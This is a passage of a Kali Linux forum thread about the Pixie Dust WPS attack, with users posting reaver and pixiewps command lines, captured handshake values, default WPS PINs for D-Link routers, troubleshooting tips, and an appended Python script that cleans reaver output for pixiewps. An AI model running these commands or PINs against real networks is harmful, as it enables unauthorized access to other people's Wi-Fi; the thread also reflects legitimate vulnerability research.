    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: ef:eb:93:91:fc:f0:16:3a:3e:b4:fe:dd:8f:b6:a8:fe:a6 :6a:7e:70:55:e5:20:78:c4:3a:c5:55:66:60:be:d0
    [+] Sending M2 message
    [P] E-Hash1: be:74:91:eb:c3:38:e0:59:7c:e1:de:5c:07:d5:1b:d3:d7 :e6:15:9e:06:09:96:f9:7c:08:4a:84:cc:df:35:0e
    [P] E-Hash2: 90:bf:2e:36:f0:65:0e:f6:41:e7:97:f8:71:02:8b:11:92 :c1:89:f1:99:63:2b:fa:01:12:6c:c5:04:b6:ec:cc
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 3 s
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]


    So I ran pixiewps separately instead of reaver and it is giving me a strange error:

    [!] Bad enrollee public key -- d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:

    I don't know what it means.
    I hope you'd shed some light on that and help....

  25. #125
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by phoenix! View Post
    Hi @DetmL, @soxrok2212,
    I recently came to know about the vulnerabilities of Realtek and other chipsets and thought to check if my router was vulnerable, and ran reaver with pixie dust mode -K 1,
    where I got to know that the model number EV-2006-07-27 belongs to the RTL8671 chipset (D-Link router).

    However I'm getting that

    "WPS pin not found"

    The output is given below:

    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 7b:37:51:7f:6c:c7:a8:0b:27:e9:a1:f8:5b:88:b5:40
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: RTL8671
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: c2:ed:e2:d6:80:81:48:fd:7e:13:7b:d2:3e:6c:a0:98
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: ef:eb:93:91:fc:f0:16:3a:3e:b4:fe:dd:8f:b6:a8:fe:a6 :6a:7e:70:55:e5:20:78:c4:3a:c5:55:66:60:be:d0
    [+] Sending M2 message
    [P] E-Hash1: be:74:91:eb:c3:38:e0:59:7c:e1:de:5c:07:d5:1b:d3:d7 :e6:15:9e:06:09:96:f9:7c:08:4a:84:cc:df:35:0e
    [P] E-Hash2: 90:bf:2e:36:f0:65:0e:f6:41:e7:97:f8:71:02:8b:11:92 :c1:89:f1:99:63:2b:fa:01:12:6c:c5:04:b6:ec:cc
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 3 s
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]


    So I ran pixiewps separately instead of reaver and it is giving me a strange error:

    [!] Bad enrollee public key -- d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:

    I don't know what it means.
    I hope you'd shed some light on that and help....
    First, you cannot use -S in your reaver command for Realtek devices. Nobody really knows why, but somehow it stops pixiewps from recovering the pin.

    Second, the RTL8671 chip is strange. It seems to use a different RNG or something. I know a few people are looking into it though.

    --I've also noticed that your nonce doesn't follow the 00:00:XX:XX:00:00:XX:XX pattern seen in other RTL8671 chips... hmmm. Would you be able to send me a cap containing a few WPS exchanges?

    As for the Bad enrollee key, it's probably just a space somewhere in your syntax that is screwing it up. Actually I just found it:
    Code:
    d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63
    Try this instead (you'll probably have to do this for every piece of data)
    Code:
    d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63
    Welcome to the forums by the way
    Last edited by soxrok2212; 2015-06-18 at 14:07.
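    An added example (not code from the thread, reaver or pixiewps): a small Python checker that strips the stray spaces the forum inserts into long hex strings, verifies each [P] field has the byte length pixiewps expects, and flags two other things visible in the output above: a PKR equal to 2, which means the capture was made with reaver -S (small DH keys), and the 00:00:XX:XX:00:00:XX:XX nonce pattern mentioned for RTL8671, which is assumed here to extend across the whole 16-byte nonce. The sample input is constructed; every value in it is made up.

```python
import re
# Expected byte lengths of the "[P]" fields reaver -vv prints (1536-bit DH keys, 128-bit nonces, 256-bit hashes).
FIELD_LEN = {"E-Nonce": 16, "R-Nonce": 16, "PKE": 192, "PKR": 192,
             "AuthKey": 32, "E-Hash1": 32, "E-Hash2": 32}
FIELD_RE = re.compile(r"\s*\[P\]\s+(" + "|".join(FIELD_LEN) + r"):\s*(.+)$")

def normalize(value: str) -> bytes:
    """Drop the whitespace forum line-wrapping inserts, then decode the hex."""
    cleaned = re.sub(r"\s+", "", value)
    if not re.fullmatch(r"([0-9a-fA-F]{2}:)*[0-9a-fA-F]{2}", cleaned):
        raise ValueError("not colon-separated hex: " + cleaned[:32])
    return bytes.fromhex(cleaned.replace(":", ""))

def parse_reaver(output: str) -> dict:
    """Collect the [P] fields from reaver output as raw bytes."""
    fields = {}
    for line in output.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = normalize(m.group(2))
    return fields

def check(fields: dict) -> list:
    """Return warnings explaining why pixiewps may reject or fail on this data."""
    warnings = [f"{n} missing" for n in FIELD_LEN if n not in fields]
    warnings += [f"{n} is {len(v)} bytes, expected {FIELD_LEN[n]}"
                 for n, v in fields.items() if len(v) != FIELD_LEN[n]]
    if "PKR" in fields and int.from_bytes(fields["PKR"], "big") == 2:
        warnings.append("PKR == 2: capture made with reaver -S (small DH keys)")
    nonce = fields.get("E-Nonce", b"")
    # Assumption: the 00:00:XX:XX:00:00:XX:XX pattern quoted in the thread,
    # extended over all 16 bytes (two zero bytes leading each 4-byte group).
    if len(nonce) == 16 and all(nonce[i] == 0 for i in range(16) if i % 4 < 2):
        warnings.append("E-Nonce matches 00:00:XX:XX:00:00:XX:XX pattern")
    return warnings

def forum_wrap(s: str) -> str:
    # Re-create the stray space the forum inserts every 50 characters.
    return " ".join(s[i:i + 50] for i in range(0, len(s), 50))

# Constructed sample in the shape of the post above; every value is made up.
SAMPLE = "\n".join([
    "[P] E-Nonce: " + forum_wrap(":".join(f"{i * 7 % 256:02x}" for i in range(16))),
    "[P] PKE: " + forum_wrap(":".join(f"{(37 * i + 11) % 256:02x}" for i in range(192))),
    "[P] R-Nonce: " + ":".join(["11"] * 16),
    "[P] PKR: " + forum_wrap(":".join(["00"] * 191 + ["02"])),
    "[P] AuthKey: " + forum_wrap(":".join(["ab"] * 32)),
    "[P] E-Hash1: " + forum_wrap(":".join(["cd"] * 32)),
    "[P] E-Hash2: " + forum_wrap(":".join(["ef"] * 32)),
])
```

    Run `check(parse_reaver(SAMPLE))` on the constructed sample and the only warning is the PKR one; feed it your own reaver output instead to see which field pixiewps would choke on.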

  26. #126
    Join Date
    2015-Apr
    Posts
    12
    Is it a DSL-2730U/DSL-2750U?

  27. #127
    Join Date
    2013-Sep
    Posts
    262
    Hi DetmL
    For the two models you speak about we could gather generic PINs (cf. WPSPIN > Default WPS PIN generator for Huawei, Belkin, ... routers)

    DSL-2730U > 20172527
    DSL-2750U > 21464065

    If there is a common PIN we already know that we deal with a "weak" WPS implementation and so there is hope... it could be "pixie dusted" somehow...
    If you have one of these models could you please send to soxrok2212 / wiire (or you can send it to me and I will share with them) a *.cap file with the reaver 1.5.2 stdout?
    Maybe, if that is not asking too much, you can add some screenshot/copy-paste from the administration interface with the Wifi-WPS security parameters and information about the device?
    Thanks in advance
    Last edited by kcdtv; 2015-06-19 at 14:53.

  28. #128
    Join Date
    2015-Jun
    Posts
    6
    @soxrok2212

    Firstly, I apologize for the late reply. I have got exams, the last few days have been pretty intense.

    1) I tried without --dh-small-keys, but no luck
    Still WPS pin not found.

    2) I've mailed to your old email-id the reaver outputs.

    3) Yeah, and the spaces in the enrollee key :|
    Tried pixiewps with correct syntax but no luck.
    It says AP might be vulnerable, try bruteforcing.
    Tried with --force a couple of times but pin not found there either.


    @DetmL

    It is D-link DSL-2750U rev U1

    Wikidevi link: https://wikidevi.com/wiki/D-Link_DSL-2750U_rev_U1

  29. #129
    Join Date
    2015-Apr
    Posts
    12
    Quote Originally Posted by phoenix! View Post
    @DetmL

    It is D-link DSL-2750U rev U1

    Wikidevi link: https://wikidevi.com/wiki/D-Link_DSL-2750U_rev_U1
    For some unknown reason, reaver is unable to retrieve the wpa2 passphrase of DSL-2730U and DSL-2750U although the default PIN is 12345670. However, Dumpper can retrieve the passphrase.

  30. #130
    Join Date
    2015-Apr
    Posts
    12
    @Kcdtv
    Sorry for the confusion. I don't have either of the devices.

  31. #131
    Join Date
    2015-Jun
    Posts
    6
    Quote Originally Posted by DetmL View Post
    For some unknown reason, reaver is unable to retrieve the wpa2 passphrase of DSL-2730U and DSL-2750U although the default PIN is 12345670. However, Dumpper can retrieve the passphrase.
    What do you mean? Default pin is 12345670? I checked with Dumpper and it couldn't find the passphrase with 12345670 as pin.

  32. #132
    Join Date
    2015-Jun
    Posts
    6
    Quote Originally Posted by kcdtv View Post
    Hi DetmL
    For the two models you speak about we could gather generic PINs (cf. WPSPIN > Default WPS PIN generator for Huawei, Belkin, ... routers)

    DSL-2730U > 20172527
    DSL-2750U > 21464065

    If there is a common PIN we already know that we deal with a "weak" WPS implementation and so there is hope... it could be "pixie dusted" somehow...
    If you have one of these models could you please send to soxrok2212 / wiire (or you can send it to me and I will share with them) a *.cap file with the reaver 1.5.2 stdout?
    Maybe, if that is not asking too much, you can add some screenshot/copy-paste from the administration interface with the Wifi-WPS security parameters and information about the device?
    Thanks in advance
    Hi kcdtv,
    I can send you the pcap files to your email, if you wish.
    I cannot upload pcap files in here.

  33. #133
    Join Date
    2015-Jun
    Posts
    3
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with an Intel Centrino Wifi N card and reaver 1.5.2 from github, mod by t6_x.

  34. #134
    Join Date
    2013-Jun
    Posts
    67
    Quote Originally Posted by bora View Post
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with an Intel Centrino Wifi N card and reaver 1.5.2 from github, mod by t6_x.
    The wireless card probably does not support injection.

  35. #135
    Join Date
    2015-Jun
    Posts
    3
    It is unreliable, but I think injection works:

    sudo aireplay-ng -9 mon0
    14:00:37 Trying broadcast probe requests...
    14:00:37 Injection is working!
    .........
    14:00:39 Trying directed probe requests...
    14:00:39 84:9C:A6:A7:22:22 - channel: 2 - 'o2-WLAN25'
    14:00:39 Ping (min/avg/max): 0.978ms/5.656ms/47.815ms Power: -49.97
    14:00:39 30/30: 100%

    14:00:39 02:23:08:F9:33:11 - channel: 1 - 'EasyBox-C54211'
    14:00:40 Ping (min/avg/max): 0.926ms/7.952ms/44.700ms Power: -43.68
    14:00:40 28/30: 93%

  36. #136
    Join Date
    2013-Sep
    Posts
    262
    Quote Originally Posted by phoenix! View Post
    Hi kcdtv,
    I can send you the pcap files to your email, if you wish.
    I cannot upload pcap files in here.
    Sorry i didn't see your message.
    For sure; thank you very much! I send you a mp with my mail.
    @ bora.
    This is not really a "pixie dust issue" if you don't get an M3... It is an issue for the pixie dust attack, but the problem is about how the WPS flow is done.
    And more information would be needed to be able to guess where the problem can come from.
    It is unreliable, but I think injection works:
    Don't worry: it is reliable. If aireplay-ng -9 works, your card can inject.

  37. #137
    Join Date
    2015-Jun
    Posts
    1
    Quote Originally Posted by bora View Post
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with an Intel Centrino Wifi N card and reaver 1.5.2 from github, mod by t6_x.
    I have the same problem. Using a 2011 MBP with broadcom drivers.
    Any help would be appreciated.

    Thanks!

  38. #138
    Join Date
    2013-Sep
    Posts
    262
    It is not that people don't want to help you, but your questions are "offtopic."
    It could be an issue with reaver, with your card, with your system configuration or with the access point... etc.
    But for sure it has nothing to do with pixiewps: pixiewps needs you to collect the needed strings properly or it cannot brute force the M3.
    How to get the M3 to brute force it with its "authkey" is another question, another subject.
    Cheers

  39. #139
    Join Date
    2015-Mar
    Posts
    54
    Just a quick update on the state of the 'project'.

    I'm really busy at the moment. I'll update/fix pixiewps when I'll be back (2-3 weeks), with (hopefully) some news.

  40. #140
    Best of luck!
    Looking forward to it.
    This is a Kali-Linux support forum - not general IT/infosec help.

    Useful Commands: OS, Networking, Hardware, Wi-Fi
    Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
    Hardware: Recommended 802.11 Wireless Cards

    Search: https://www.kali.org/search/
    Documentation: http://docs.kali.org/ (Offline PDF version)
    Bugs Reporting & Tool Requests: https://bugs.kali.org/
    Kali Tool List, Versions & Man Pages: http://tools.kali.org/

  41. #141
    Join Date
    2015-Jul
    Posts
    3
    Hi, I wanted help regarding a Dlink DSL 2750u router I was testing with RTL8167 chipset with pixiewps. Any updates on the issue?

  42. #142
    Join Date
    2015-Mar
    Posts
    54
    We are still looking into the RTL816x chipset. We have some information about how the nonce might be 'built'. However, it's still not enough to implement a feasible bruteforce.

  43. #143
    Join Date
    2015-Aug
    Posts
    3
    Nice work indeed, tried this today on DIR-605L and it worked like a charm even with bad signals (AP is very far away); WPS transaction failed a few times and then voila.
    PIN was not default and started with 4; the normal WPS attack vector would never have found it because of lockout.

    I think the WPS attack is not possible for NETGEAR? Tried with two different APs but no luck.
    I have got a lot of APs if you want me to test something new.

  44. #144
    Join Date
    2015-Jul
    Posts
    3
    Quote Originally Posted by wiire View Post
    We are still looking into the RTL816x chipset. We have some information about how the nonce might be 'built'. However, it's still not enough to implement a feasible bruteforce.
    Thanks, waiting for it. Also I would like to share some data regarding some vulnerable routers and chipsets (about 6); where can I submit the data?

  45. #145
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by neo45215 View Post
    Thanks, waiting for it. Also I would like to share some data regarding some vulnerable routers and chipsets (about 6); where can I submit the data?
    Contact me on skype [skype removed for obvious reasons] and I'll add it to the database
    Last edited by soxrok2212; 2015-08-08 at 13:46.

  46. #146
    Join Date
    2015-Jul
    Posts
    3
    Quote Originally Posted by soxrok2212 View Post
    Contact me on skype [skype removed for obvious reasons] and I'll add it to the database
    Will get back to you after I finish my shift, got your contact.
    Also, off topic, where can I get help regarding Kali NetHunter on Nexus 7 nakasig?
    Regarding reaver and pixie support though.

  47. #147
    Join Date
    2015-Mar
    Posts
    141
    Last edited by aanarchyy; 2015-08-22 at 23:53.

  48. #148
    Join Date
    2015-Jun
    Posts
    6
    Quote Originally Posted by aanarchyy View Post
    Cool! Works with Broadcom chipset natively?


    Also any news on RTL816x chipset, yet?

  49. #149
    Join Date
    2013-Sep
    Posts
    262
    Nice job aanarchy!

  50. #150
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by kcdtv View Post
    Nice job aanarchy!
    Thanks :-D

    I have confirmed the pixiewps port does work, but I have yet to confirm the reaver port works, and I have very little time to do so. If someone would be able to test this, it would help.
